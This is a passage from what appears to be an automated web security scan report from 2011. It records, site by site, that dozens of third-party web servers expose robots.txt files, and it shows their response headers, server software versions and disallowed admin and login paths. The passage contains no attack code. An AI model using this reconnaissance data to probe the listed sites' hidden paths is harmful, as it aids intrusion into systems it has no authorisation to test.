Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...
30.63. http://www.amateurow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amateurow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amateurow.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 01 May 2011 23:41:52 GMT
Content-Type: text/plain
Content-Length: 24
Last-Modified: Thu, 01 Oct 2009 11:14:47 GMT
Connection: close
Expires: Wed, 04 May 2011 23:41:52 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes

User-agent: *
Disallow:
30.64. http://www.americanbible.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americanbible.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americanbible.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:09:51 GMT
Server: Apache
Last-Modified: Wed, 28 Apr 2010 14:33:22 GMT
ETag: "24c86-636-4854ce45ab080"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Mon, 16 May 2011 00:09:51 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
30.65. http://www.americanclassifieds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americanclassifieds.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americanclassifieds.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:38:21 GMT
Server: Apache/1.3.41 (Unix) mod_jk/1.2.27
Last-Modified: Sat, 16 Oct 2010 01:36:51 GMT
ETag: "1335f-e4-4cb901b3"
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: text/plain

# robots.txt for http://www.tnol.com/
Sitemap: http://www.tnol.com/sitemap1.xml

User-agent: *

Disallow: /email_ad.cfm*
Disallow: /viewImageOffensive.cfm*
Disallow: /saveAd.cfm*
Disallow: /login.cfm*
...[SNIP]...
30.66. http://www.androidtablets.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.androidtablets.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.androidtablets.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:39 GMT
Server: Apache
Last-Modified: Thu, 24 Dec 2009 02:39:35 GMT
ETag: "2a78c6-1e5-47b705980a7c0"
Accept-Ranges: bytes
Content-Length: 485
Connection: close
Content-Type: text/plain

Sitemap: http://www.androidtablets.net/forum/sitemap_index.xml.gz

User-agent: *
Disallow: /*-print/
Disallow: /vbseocp.php
Disallow: /login.php
Disallow: /member.php
Disallow: /memberlist.php
Disallo
...[SNIP]...
30.67. http://www.anilinkz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.anilinkz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.anilinkz.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:34 GMT
Server: Apache
Last-Modified: Thu, 30 Sep 2010 05:55:45 GMT
ETag: "34018d8-203-49173ba9d9a40"
Accept-Ranges: bytes
Content-Length: 515
Cache-Control: max-age=604800, public, must-revalidate
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /files/
Disallow: /testing/
Disallow: /static/
Disallow: /temp/
Disallow: /images/
Disallow: /banner/
Disallow: /pictures/
Disallow: /wp-admin/
Disallow: /w
...[SNIP]...
30.68. http://www.animatedknots.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.animatedknots.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.animatedknots.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 08 Apr 2011 19:58:24 GMT
ETag: "6fa83-600-a603f800"
Accept-Ranges: bytes
Content-Length: 1536
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /logo.php
Disallow: /logodemo.php

User-agent: Titan
Disallow: /

User-agent: ExtractorPro
Disallow: /

User-agent: atSpider
Disallow: /

User-agent: cherry
...[SNIP]...
30.69. http://www.anvato.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.anvato.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.anvato.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:19:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: W3 Total Cache/0.9.1.3
X-Pingback: http://www.anvato.com/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Length: 71
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.anvato.com/sitemap.xml.gz
30.70. http://www.aol.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aol.co.uk

Response

HTTP/1.0 200 OK
X-RSP: 1
set-cookie: dcisid=4276800956.1187953741.1436025088; path=/
Cache-Control: no-cache, no-store, private, max-age=0
Set-Cookie: bandType="narrowband"; path=/; domain=.aol.co.uk
MIME-Version: 1.0
Date: Mon, 02 May 2011 00:33:04 GMT
Server: AOLserver/4.0.10
Content-Type: text/plain
Content-Length: 107
Connection: keep-alive


User-agent: *
Disallow: /talktalk
Disallow: /ukrestart
Disallow: /links
30.71. http://www.apartmentsmart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmentsmart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apartmentsmart.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 07 Jun 2010 23:04:16 GMT
Accept-Ranges: bytes
ETag: "ec6b0c1956cb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: .ASPXANONYMOUS=JOlHb-o-zAEkAAAAYjE3YmU4OTQtYjNhOS00ZDVkLTg1N2UtMWQ0MTI4ODBjYzBk0; expires=Sun, 10-Jul-2011 10:16:29 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:36:29 GMT
Connection: close
Content-Length: 2351

#/-----------------------------------------------\
#| |
#| |
#|
...[SNIP]...
30.72. http://www.architecturaldigest.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.architecturaldigest.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.architecturaldigest.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "6520a050098b9c331ba54961adc5197b:1218724813"
Last-Modified: Thu, 14 Aug 2008 14:40:13 GMT
Accept-Ranges: bytes
Content-Length: 179
Content-Type: text/plain
Date: Mon, 02 May 2011 00:19:00 GMT
Connection: close
X-N: S

#disallow /user/ as there are incoming links going to pages within the /user/ directory that can't be accessed.
User-agent: *
Disallow: /user/
Disallow: /ontheweb/blogs/delineator
30.73. http://www.argosy.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.argosy.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.argosy.edu

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: text/plain
Last-Modified: Tue, 01 Mar 2011 15:28:08 GMT
Accept-Ranges: bytes
ETag: "074364425d8cb1:fc87"
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:00:38 GMT
Connection: close

# robots.txt, www.argosy.edu 03/01/2011

User-agent: *
Disallow: /interview
Disallow: /StudentLink
Disallow: /pdf/social-media-terms-of-use.pdf

User-Agent: Charlotte
Disallow: /

User-Agen
...[SNIP]...
30.74. http://www.arkive.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arkive.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.arkive.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:52:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 10 Mar 2011 16:25:33 GMT
ETag: "1298629-119-4b681940"
Accept-Ranges: bytes
Content-Length: 281
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /misc/Coral/
Disallow: /*/*/*displayMode=link-to-this-page
Disallow: /search

Disallow: /*/*/related
Disallow: /*/*/user-images
Disallow: /*/*/facts
...[SNIP]...
30.75. http://www.arktimes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arktimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.arktimes.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:29:05 GMT
Server: Apache
Last-Modified: Thu, 23 Jul 2009 22:30:55 GMT
ETag: "1c8-4a68e49f"
Accept-Ranges: bytes
Content-Length: 456
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /gyrobase/ArticleArchives
Disallow: /gyrobase/EventSearch
Disallow: /gyrobase/FilmSearch
Disallow: /gyrobase/LocationSearch
Disallow: /gyrobase/MovieTimes
Disallow: /gyrobase/S
...[SNIP]...
30.76. http://www.armchairgeneral.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.armchairgeneral.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.armchairgeneral.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:30:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 12 Jun 2009 20:34:43 GMT
ETag: "30005f-59e-46c2ca36c7ec0"
Accept-Ranges: bytes
Content-Length: 1438
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /chat

Disallow: /banner

Disallow: /cgi-bin

Disallow: /directory

Disallow: /games

Disallow: /modules

Disallow: /napoleon

Disallow: /phpQJr/

Disallow: /poll

Disallow:
...[SNIP]...
30.77. http://www.ashtondrake.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ashtondrake.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ashtondrake.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:04 GMT
Accept-Ranges: bytes
ETag: W/"151-1297777432000"
Last-Modified: Tue, 15 Feb 2011 13:43:52 GMT
Content-Type: text/plain;charset=utf-8
Content-Length: 151
Vary: Accept-Encoding
Connection: close

User-agent: *
Disallow: /quickinfo.html
Disallow: /itemshipinfo.html
Disallow: /store/
Disallow: /maregistersuccess.html
Disallow: /assets/
Allow: /


30.78. http://www.assistedliving.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.assistedliving.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.assistedliving.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 58
Content-Type: text/plain
Content-Location: http://www.assistedliving.com/assistedliving.com/robots.txt
Last-Modified: Mon, 01 Jun 2009 20:58:49 GMT
Accept-Ranges: bytes
ETag: "ac714c3fbe2c91:44c4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:35:47 GMT
Connection: close

...# Do not allow crawling

User-Agent: *
Disallow: /
30.79. http://www.autotrafficavalanche.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrafficavalanche.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autotrafficavalanche.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:35 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Last-Modified: Wed, 25 Aug 2010 12:07:36 GMT
ETag: "99201f-19-48ea4ba2af200"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /
30.80. http://www.awltovhc.com/image-4989411-10774308  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.awltovhc.com
Path:   /image-4989411-10774308

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.awltovhc.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "FhzzhbeZ+32"
Last-Modified: Mon, 25 Apr 2011 22:28:50 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 37
Date: Mon, 02 May 2011 02:19:11 GMT

# go away
User-agent: *
Disallow: /
30.81. http://www.bakingbites.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bakingbites.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bakingbites.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:34:36 GMT
Server: Apache
X-Pingback: http://bakingbites.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:
30.82. http://www.bankforeclosuressale.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankforeclosuressale.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bankforeclosuressale.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:44:48 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 18 Oct 2010 14:52:34 GMT
ETag: "1c6-492e55390b080"
Accept-Ranges: bytes
Content-Length: 454
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /js/
Disallow: /plesk-stat/
Disallow: /picture_library/
Disallow: /test/
Disallow: /linkspider/
Disallow: /list.php
Disallow: /lview.php
Disallow: /wp/wp-admin/
Disallow: /wp/a
...[SNIP]...
30.83. http://www.bankonyourself.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankonyourself.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bankonyourself.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:17:40 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 299
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /wp-admin
Disallow: /wp-login.php
Disallow: /xmlrpc.php
Disallow: /?s=
Disallow: /admin
Disallow: /page/*/
Disallow: /*/page/*/
Disallow: /Bank-On-Yourself-Special-Repo
...[SNIP]...
30.84. http://www.barnstormers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barnstormers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.barnstormers.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:36:07 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 07 Feb 2008 02:42:13 GMT
ETag: "485-11f-6bc84b40"
Accept-Ranges: bytes
Content-Length: 287
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: ia_archiver
Disallow: /

User-agent: *
Disallow: /user
Disallow: /banner_manager/click.php
Disallow: /click.php
Disallow: /export*
Disallow: /ad_manager/export*
Disallow: /*.csv$
Disallow:
...[SNIP]...
30.85. http://www.beauty-advices.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beauty-advices.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beauty-advices.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:58:27 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
Last-Modified: Tue, 12 Apr 2011 12:19:22 GMT
ETag: "2789725-3d0-4a0b7b3c07951"
Accept-Ranges: bytes
Content-Length: 976
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content
Disallow: /2006/
Disallow: /feed/
Disallow: /index.php
Disallow: /trackback/
Disallow: */trac
...[SNIP]...
30.86. http://www.beefybulldog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beefybulldog.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beefybulldog.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 09 Sep 2010 01:56:27 GMT
ETag: "9d82a9-6a-48fc9f02508c0"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: text/plain

# Disallow Web Bots
User-agent: *
Disallow: /

# Disallow Archive Bots
User-agent: ia_archiver
Disallow: /
30.87. http://www.bestbridalprices.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bestbridalprices.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bestbridalprices.com

Response

HTTP/1.0 200 OK
Connection: close
Date: Sun, 01 May 2011 23:47:41 GMT
Server: Cherokee
Last-Modified: Tue, 29 Jun 2010 17:37:18 GMT
Content-Type: text/plain
Content-Length: 90

User-agent: *
Sitemap: http://www.bestbridalprices.com/sitemap.xml
Disallow: /cgi-bin/
30.88. http://www.blackanddeckerappliances.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackanddeckerappliances.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blackanddeckerappliances.com

Response

HTTP/1.1 200 OK
Content-Length: 2590
Content-Type: text/plain
Last-Modified: Mon, 01 Nov 2010 17:09:55 GMT
Accept-Ranges: bytes
ETag: "2bdbf9be779cb1:82a1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:18:06 GMT
Connection: close

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...
30.89. http://www.bloodhero.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bloodhero.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bloodhero.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sun, 27 Mar 2011 03:16:22 GMT
Accept-Ranges: bytes
ETag: "39859592deccb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:54:24 GMT
Connection: close
Content-Length: 26
Set-Cookie: LB-Persist=1h+BZ2rjv8XTi39PpMUtQ/Kjihcnd7KJB649CsO49/DiyFJIZkAlSbewN/NMyQd+Ce1LntJiiBm2MiY=; path=/

User-agent: *
Disallow: /
30.90. http://www.bluesplayer.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluesplayer.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bluesplayer.co.uk

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:10:50 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "30-4d90427f-0"
Last-Modified: Mon, 28 Mar 2011 08:10:39 GMT
Content-Type: text/plain
Content-Length: 48

User-agent: *
Disallow:
Disallow: /cgi-bin/
30.91. http://www.bnbtobacco.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bnbtobacco.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bnbtobacco.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sat, 08 Jan 2011 21:48:49 GMT
Accept-Ranges: bytes
ETag: "3b41ed57dafcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:40 GMT
Connection: close
Content-Length: 305

User-agent: *
Disallow: /manage/
Disallow: confirmation.aspx
Disallow: default.aspx
Disallow: accounttype.aspx
Disallow: /_images/
Disallow: /_controls/
Disallow: /merchants/
Disallow: frmInte
...[SNIP]...
30.92. http://www.boatmotors.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boatmotors.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boatmotors.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:31 GMT
Server: Apache
Vary: *
Last-Modified: Tue, 06 Apr 2004 22:17:04 GMT
ETag: "39439e-85-40732c60"
Accept-Ranges: bytes
Content-Length: 133
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /engineparts/
Disallow: /sweepstakesreply.html
Disallow: /engine_testimonials.html
User-Agent: ia_archiver


30.93. http://www.bocajava.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bocajava.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bocajava.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"246-1292855965000"
Last-Modified: Mon, 20 Dec 2010 14:39:25 GMT
Content-Type: text/plain
Content-Length: 246
Date: Mon, 02 May 2011 00:03:41 GMT
Connection: close
Set-Cookie: security=1bjb; path=/

User-agent: *
Allow: /
Disallow: /myAccount.do
Disallow: /guestCheckout.do
Disallow: /confirmOrder.do
Disallow: /performLogonCheckout.do
Disallow: /register.do
Disallow: /checkout.do
Disallow: /Proces
...[SNIP]...
30.94. http://www.bonhams.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bonhams.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bonhams.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:32 GMT
Server: Apache
Last-Modified: Fri, 10 Feb 2006 15:25:01 GMT
ETag: "2867-d9-40c725522ed40"
Accept-Ranges: bytes
Content-Length: 217
Vary: Accept-Encoding
Content-Type: text/plain
Expires: Sun, 01 May 2011 23:31:32 GMT
Connection: close

User-agent: *
Disallow: Maintenance
Disallow: Missing
Disallow: /newswire/
Disallow: /thumbs/
Disallow: /usimages/
Disallow: /usareas/
Disallow: /usabout/
Disallow: /uslib/
Disallow: /usauction/
Disal
...[SNIP]...
30.95. http://www.boredpanda.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boredpanda.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boredpanda.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:35:46 GMT
Server: Apache
Vary: Cookie
X-Pingback: http://www.boredpanda.com/blog/xmlrpc.php
Connection: close
Content-Type: text/html; charset="UTF-8"

User-agent: *
Disallow:
30.96. http://www.brookshirebrothers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brookshirebrothers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brookshirebrothers.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:05:49 GMT
Server: Apache
Last-Modified: Fri, 08 Oct 2010 14:59:14 GMT
ETag: "466678-177-40fe7480"
Accept-Ranges: bytes
Content-Length: 375
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...
30.97. http://www.bucadibeppo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bucadibeppo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bucadibeppo.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: text/plain
Date: Mon, 02 May 2011 00:06:14 GMT
Accept-Ranges: bytes
ETag: "e43654ca88b6cb1:0"
Connection: close
Set-Cookie: X-Mapping-pjfkgmck=9F6E3897466E5DEE025635F624ECA7DF; path=/
Last-Modified: Mon, 17 Jan 2011 20:54:53 GMT
X-Powered-By: ASP.NET
Content-Length: 652

# /robots.txt file for http://www.bucadibeppo.com/
# mail web@bucainc.com for feedback and comments

User-agent: *

Sitemap: http://www.bucadibeppo.com/sitemap.aspx
Disallow: /cacheadmin.aspx
Disallow
...[SNIP]...
30.98. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.business.att.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:32:54 GMT
Content-Length: 256
Content-Type: text
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
Last-Modified: Tue, 29 Mar 2011 16:21:13 GMT
ETag: "4f518-100-4d9206f9"
Accept-Ranges: bytes
X-Cache: MISS from 12.120.78.33
Via: 1.1 12.120.78.33:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

User-agent: *
Disallow: /library/
Disallow: /*online_campaign/cioforum/
Disallow: /*online_campaign/execevents/
Disallow: /*online_campaign/ciohcforum/
Disallow: /*online_campaign/tlf/
Disallow: /*ca
...[SNIP]...
30.99. http://www.calculatorcat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.calculatorcat.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.calculatorcat.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:29 GMT
Server: Apache
Last-Modified: Thu, 03 Mar 2005 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 61
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cs
Disallow: /codesrc
Disallow: /src
30.100. http://www.calvarywilliamsport.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.calvarywilliamsport.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.calvarywilliamsport.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:22:15 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Sat, 31 May 2008 02:46:24 GMT
Accept-Ranges: bytes
Content-Length: 72
Content-Type: text/plain
Age: 0
Server: YTS/1.19.8

User-agent: *
Disallow: /pdf
Disallow: /logs
Disallow: /cm59.html

30.101. http://www.camp-california.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.camp-california.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.camp-california.com

Response

